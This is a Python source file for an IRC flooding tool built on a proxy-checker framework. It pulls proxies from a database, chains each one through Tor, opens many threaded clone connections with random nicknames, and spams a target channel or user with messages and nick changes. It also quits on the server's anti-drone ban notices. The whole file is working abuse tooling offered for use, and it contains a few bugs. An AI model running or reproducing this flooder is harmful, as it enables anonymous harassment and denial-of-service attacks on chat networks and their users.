459 lines
14 KiB
Python
459 lines
14 KiB
Python
#!/usr/bin/env python
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import threading
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import time, random, string, re, copy
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try:
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from geoip import geolite2
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geolite = True
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except:
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geolite = False
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from config import Config
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import mysqlite
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from misc import _log
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import rocksock
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config = Config()
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_run_standalone = False
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cached_dns = dict()
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with open('usernames.txt') as h:
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nicklist = [ nick.strip() for nick in h.readlines() ]
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def try_div(a, b):
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if b != 0: return a/float(b)
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return 0
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def socks4_resolve(srvname, server_port):
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srv = srvname
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if srv in cached_dns:
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srv = cached_dns[srvname]
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if config.watchd.debug:
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_log("using cached ip (%s) for %s"%(srv, srvname), "debug")
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else:
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dns_fail = False
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try:
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af, sa = rocksock.resolve(rocksock.RocksockHostinfo(srvname, server_port), want_v4=True)
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if sa is not None:
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cached_dns[srvname] = sa[0]
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srv = sa[0]
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else: dns_fail = True
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except rocksock.RocksockException as e:
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assert(e.get_errortype() == rocksock.RS_ET_GAI)
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dns_fail = True
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if dns_fail:
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fail_inc = 0
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_log("could not resolve connection target %s"%srvname, "ERROR")
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return False
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return srv
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def flood(sock):
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nick = random.choice(nicklist)
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if config.flood.message is not None: msgs = config.flood.message.split(';')
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sock.send('NICK %s\nUSER %s %s localhost :%s\n' %(nick, nick, nick, nick))
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ticks = time.time()
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sent_ping = False
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while True:
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if config.flood.max_time > 0:
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if (time.time() - ticks) > config.flood.max_time: break
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recv = sock.recvline()
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print(recv.strip())
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if not len(recv): break
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elif 'Proxy/Drone' in recv or 'contact kline@' in recv: break
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elif recv.startswith('ERROR'): break
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elif recv.startswith('PING'):
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if config.flood.use_timeout:
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if sent_ping: continue
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sock.send( recv.replace('PING', 'PONG'))
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sent_ping = True
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else:
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_split = recv.split(' ')
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# irc welcome message
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if _split[1] == '001':
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# target is a chan
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if '#' in config.flood.target or '%' in config.flood.target or '%' in config.flood.target:
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sock.send('JOIN %s\r\n' % config.flood.target)
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# target is a nick
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elif config.flood.message is not None:
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if config.flood.change_nick:
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for i in range(3): sock.send('PRIVMSG %s :%s\r\nNICK %s\r\n' %(config.flood.target, random.choice(msgs), random.choice(nicklist)))
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else:
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sock.send('PRIVMSG %s :%s\r\n' % (config.flood.target, random.choice(msgs)))
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if config.flood.once:
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sock.send('QUIT\r\n')
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# end of names list (joined a chan)
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elif _split[1] == '366':
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if config.flood.message is not None:
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if config.flood.change_nick:
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for i in range(3): sock.send('PRIVMSG %s :%s\r\nNICK %s\r\n' %(config.flood.target, random.choice(msgs), random.choice(nicklist)))
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else:
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sock.send('PRIVMSG %s :%s\r\n' % (config.flood.target, random.choice(msgs)))
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if config.flood.cycle:
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sock.send('PART %s\r\nJOIN %s\r\n)' % (_split[3], _split[3]))
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time.sleep(1)
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elif config.flood.once:
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sock.send('QUIT\r\n')
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# nick already used
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elif _split[1] == '433':
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sock.send('NICK %s\r\n' % random.choice(nicknames))
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try: sock.disconnect()
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except: pass
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class WorkerJob():
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def __init__(self, proxy, proto, failcount, success_count, total_duration, country, oldies = False):
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self.proxy = proxy
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self.proto = proto
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self.failcount = failcount
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self.checktime = None
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self.success_count = success_count
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self.total_duration = total_duration
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self.country = country
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self.isoldies = oldies
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def connect_socket(self):
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srvname = config.flood.server
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protos = ['http', 'socks5', 'socks4'] if self.proto is None else [self.proto]
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use_ssl = random.choice([0,1]) if config.flood.use_ssl == 2 else config.flood.use_ssl
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server_port = 6697 if use_ssl else 6667
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fail_inc = 1
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for proto in protos:
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torhost = random.choice(config.torhosts)
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# socks4 (without 4a) requires a raw ip address
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# rocksock automatically resolves if needed, but it's more
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# efficient to cache the result.
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if proto == 'socks4': srv = socks4_resolve(srvname, server_port)
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else: srv = srvname
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## skip socks4 failed resolution
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if not srv: continue
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duration = time.time()
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proxies = [
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rocksock.RocksockProxyFromURL('socks4://%s' % torhost),
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rocksock.RocksockProxyFromURL('%s://%s' % (proto, self.proxy)),
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]
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try:
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sock = rocksock.Rocksock(host=srv, port=server_port, ssl=use_ssl, proxies=proxies, timeout=config.watchd.timeout)
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sock.connect()
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flood(sock)
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return sock, proto, duration, torhost, srvname, 0
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except rocksock.RocksockException as e:
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if config.watchd.debug:
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_log("proxy failed: %s://%s: %s"%(proto, self.proxy, e.get_errormessage()), 'debug')
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et = e.get_errortype()
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err = e.get_error()
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fp = e.get_failedproxy()
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sock.disconnect()
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if et == rocksock.RS_ET_OWN:
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if fp == 1 and \
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err == rocksock.RS_E_REMOTE_DISCONNECTED or \
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err == rocksock.RS_E_HIT_TIMEOUT:
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# proxy is not online, so don't waste time trying all possible protocols
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break
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elif fp == 0 and \
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err == rocksock.RS_E_TARGET_CONN_REFUSED:
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fail_inc = 0
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if random.randint(0, (config.flood.threads-1)/2) == 0:
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_log("could not connect to proxy 0, sleep 5s", "ERROR")
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time.sleep(5)
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elif et == rocksock.RS_ET_GAI:
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assert(0)
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fail_inc = 0
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_log("could not resolve connection target %s"%srvname, "ERROR")
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break
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except KeyboardInterrupt as e:
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raise(e)
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return None, None, None, None, None, fail_inc
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def run(self):
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self.checktime = int(time.time())
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sock, proto, duration, tor, srv, failinc = self.connect_socket()
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return
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class WorkerThread():
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def __init__ (self, id):
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self.id = id
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self.done = threading.Event()
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self.thread = None
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self.workqueue = []
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self.workdone = []
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self.lock = threading.Lock()
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def stop(self):
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self.done.set()
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def term(self):
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if self.thread: self.thread.join()
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def add_jobs(self, jobs):
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with self.lock:
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self.workqueue.extend(jobs)
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def return_jobs(self):
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with self.lock:
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jobs = self.workqueue
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self.workqueue = []
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return jobs
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def jobcount(self):
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return len(self.workqueue)
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def collect(self):
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wd = copy.copy(self.workdone)
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self.workdone = []
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return wd
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def start_thread(self):
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self.thread = threading.Thread(target=self.workloop)
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self.thread.start()
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def pop_if_possible(self):
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with self.lock:
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if len(self.workqueue):
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job = self.workqueue.pop()
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else:
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job = None
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return job
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def workloop(self):
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success_count = 0
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job_count = 0
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duration_total = 0
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duration_success_total = 0
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while True:
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job = self.pop_if_possible()
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if job:
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nao = time.time()
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job.run()
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spent = time.time() - nao
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if job.failcount == 0:
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duration_success_total += spent
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success_count += 1
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job_count += 1
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duration_total += spent
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self.workdone.append(job)
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elif not self.thread:
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break
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if self.done.is_set(): break
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time.sleep(0.01)
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if self.thread:
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succ_rate = try_div(success_count, job_count)*100
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avg_succ_t = try_div(duration_success_total, success_count)
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avg_fail_t = try_div(duration_total-duration_success_total, job_count-success_count)
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avg_t = try_div(duration_total, job_count)
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_log("terminated, %d/%d (%.2f%%), avg.time S/F/T %.2f, %.2f, %.2f" \
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% (success_count, job_count, succ_rate, avg_succ_t, avg_fail_t, avg_t) \
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, self.id)
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class Proxywatchd():
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def stop(self):
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_log('halting... (%d thread(s))' % len([item for item in self.threads if True]), 'watchd')
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self.stopping.set()
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def _cleanup(self):
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for wt in self.threads:
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wt.stop()
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for wt in self.threads:
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wt.term()
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self.collect_work()
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self.submit_collected()
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self.stopped.set()
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def finish(self):
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if not self.in_background: self._cleanup()
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while not self.stopped.is_set(): time.sleep(0.1)
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success_rate = try_div(self.totals['success'], self.totals['submitted']) * 100
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_log("total results: %d/%d (%.2f%%)"%(self.totals['success'], self.totals['submitted'], success_rate), "watchd")
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def _prep_db(self):
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self.mysqlite = mysqlite.mysqlite(config.watchd.database, str)
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def _close_db(self):
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if self.mysqlite:
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self.mysqlite.close()
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self.mysqlite = None
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def __init__(self):
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config.load()
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self.in_background = False
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self.threads = []
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self.stopping = threading.Event()
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self.stopped = threading.Event()
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# create table if needed
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self._prep_db()
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self.mysqlite.execute('CREATE TABLE IF NOT EXISTS proxylist (proxy BLOB, country BLOB, added INT, failed INT, tested INT, source BLOB, dronebl INT, proto TEXT, success_count INT, total_duration INT)')
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self.mysqlite.commit()
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self._close_db()
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self.submit_after = config.watchd.submit_after # number of collected jobs before writing db
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self.jobs = []
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self.collected = []
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self.totals = {
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'submitted':0,
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'success':0,
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}
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def fetch_rows(self):
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self.isoldies = False
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q = 'SELECT proxy,proto,failed,success_count,total_duration,country FROM proxylist WHERE failed = 0 ORDER BY RANDOM()'
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rows = self.mysqlite.execute(q).fetchall()
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return rows
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def prepare_jobs(self):
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self._prep_db()
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## enable tor safeguard by default
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self.tor_safeguard = config.watchd.tor_safeguard
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rows = self.fetch_rows()
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#print('preparing jobbs, oldies: %s' % str(self.isoldies))
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for row in rows:
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job = WorkerJob(row[0], row[1], row[2], row[3], row[4], row[5], self.isoldies)
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self.jobs.append(job)
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self._close_db()
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def collect_work(self):
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for wt in self.threads:
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self.collected.extend(wt.collect())
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def collect_unfinished(self):
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for wt in self.threads:
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jobs = wt.return_jobs()
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self.jobs.extend(jobs)
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if len(self.jobs):
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_log("collected %d unfinished jobs"%len(self.jobs), "watchd")
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def submit_collected(self):
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if len(self.collected) == 0: return True
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sc = 0
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args = []
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for job in self.collected:
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if job.failcount == 0: sc += 1
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args.append( (job.failcount, job.checktime, 1, job.country, job.proto, job.success_count, job.total_duration, job.proxy) )
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success_rate = (float(sc) / len(self.collected)) * 100
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ret = True
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if len(self.collected) >= 100 and success_rate <= config.watchd.outage_threshold and self.tor_safeguard:
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_log("WATCHD %.2f%% SUCCESS RATE - tor circuit blocked? won't submit fails"%success_rate, "ERROR")
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if sc == 0: return False
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args = []
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for job in self.collected:
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if job.failcount == 0:
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args.append( (job.failcount, job.checktime, 1, job.country, job.proto, job.success_count, job.total_duration, job.proxy) )
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ret = False
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_log("success rate: %.2f%%"%(len(self.collected), success_rate), 'flood')
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#self._prep_db()
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#query = 'UPDATE proxylist SET failed=?,tested=?,dronebl=?,country=?,proto=?,success_count=?,total_duration=? WHERE proxy=?'
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#self.mysqlite.executemany(query, args)
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#self.mysqlite.commit()
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#self._close_db()
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self.collected = []
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self.totals['submitted'] += len(args)
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self.totals['success'] += sc
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return ret
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def start(self):
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if config.flood.threads == 1 and _run_standalone:
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return self._run()
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else:
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return self._run_background()
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def run(self):
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if self.in_background:
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while 1: time.sleep(1)
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def _run_background(self):
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self.in_background = True
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t = threading.Thread(target=self._run)
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t.start()
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def _run(self):
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_log('starting...', 'watchd')
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for i in range(config.flood.threads):
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# XXX: multiplicator
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for i in range(config.flood.clones):
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threadid = ''.join( [ random.choice(string.letters) for x in range(5) ] )
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wt = WorkerThread(threadid)
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if self.in_background:
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wt.start_thread()
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self.threads.append(wt)
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time.sleep( (random.random()/100) )
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sleeptime = 0
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while True:
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if self.stopping.is_set():
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if self.in_background: self._cleanup()
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break
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if sleeptime == 0:
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sleeptime = 1
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else:
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time.sleep(1)
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sleeptime -= 1
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continue
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if self.threads[random.choice(xrange(len(self.threads)))].jobcount() == 0:
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self.collect_unfinished()
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if not len(self.jobs):
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self.collect_work()
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if not self.submit_collected() and self.tor_safeguard:
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_log("zzZzZzzZ sleeping 1 minute(s) due to tor issues - consider decreasing thread number!", "watchd")
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self.collect_unfinished()
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sleeptime = 1*60
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else:
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self.prepare_jobs()
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else:
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if len(self.jobs) < len(self.threads):
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# allow threads enough time to consume the jobs
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sleeptime = 10
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if len(self.jobs):
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_log("handing out %d jobs to %d thread(s)"% (len(self.jobs), len(self.threads)), 'watchd')
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jpt = len(self.jobs)/len(self.threads)
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if len(self.jobs)/float(len(self.threads)) - jpt > 0.0: jpt += 1
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for tid in xrange(len(self.threads)):
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self.threads[tid].add_jobs(self.jobs[tid*jpt:tid*jpt+jpt])
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self.jobs = []
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if not self.in_background: # single_thread scenario
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self.threads[0].workloop()
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self.collect_work()
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if len(self.collected) > self.submit_after:
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if not self.submit_collected() and self.tor_safeguard:
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_log("zzZzZzzZ sleeping 1 minute(s) due to tor issues - consider decreasing thread number!", "watchd")
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self.collect_unfinished()
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sleeptime = 1*60
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time.sleep(1)
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sleeptime -= 1
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if __name__ == '__main__':
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_run_standalone = True
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config.load()
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w = Proxywatchd()
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try:
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w.start()
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w.run()
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except KeyboardInterrupt as e:
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pass
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finally:
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w.stop()
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w.finish()
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